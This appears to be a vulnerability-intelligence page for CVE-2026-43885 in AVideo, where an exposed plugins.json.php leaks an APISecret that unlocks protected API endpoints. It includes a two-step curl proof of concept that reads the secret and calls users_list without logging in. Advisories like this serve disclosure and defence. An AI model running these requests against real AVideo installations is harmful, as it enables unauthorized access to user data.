HomeCVE Intelligence › CVE-2026-43885
CVSS 7.5 HIGH Vulnerability

CVE-2026-43885: AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missi…

Summary An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in. Details objects/plugins.json.php is public and still expo…

7.5CVSS Score
HIGHSeverity
NOCISA KEV
VulnerabilityImpact Type

📋 Vulnerability Details

CVE IDCVE-2026-43885
Vendorcomposer
Affected Productwwbn/avideo
Vulnerability TypeVulnerability
CVSS Score7.5 (HIGH)
Actively Exploited❌ No known exploitation
Patch StatusSee Vendor Advisory →
Reported ByCYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories)

🔬 Technical Analysis

#

Summary An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in.

Details objects/plugins.json.php is public and still exposes plugin object_data containing APISecret. That secret is accepted by plugin/API/get.json.php as authentication.

PoC 1. Get plugin config (contains APISecret): ``bash curl 'http:// /objects/plugins.json.php'

` 2. Copy APISecret from response, then call API directly: `bash curl --get 'http:// /plugin/API/get.json.php' \ --data-urlencode 'APIName=users_list' \ --data-urlencode 'APISecret= ' \ --data-urlencode 'rowCount=3' \ --data-urlencode 'current=1' ``

Impact Unauthenticated disclosure of sensitive config (APISecret) leading to unauth

📚 Advisory References

⚡ DETECTION RULES AVAILABLE

Get CVE-2026-43885 Detection Pack

Sigma rules, YARA signatures, IOC table, and SIEM queries for Splunk, Elastic, Sentinel, and Chronicle — deployable in 5 minutes.

✓ Sigma Rules ✓ YARA Pack ✓ IOC Table ✓ SIEM Queries
🛡️ Get Detection Pack → 🔌 Access via API →

🔗 Related Intelligence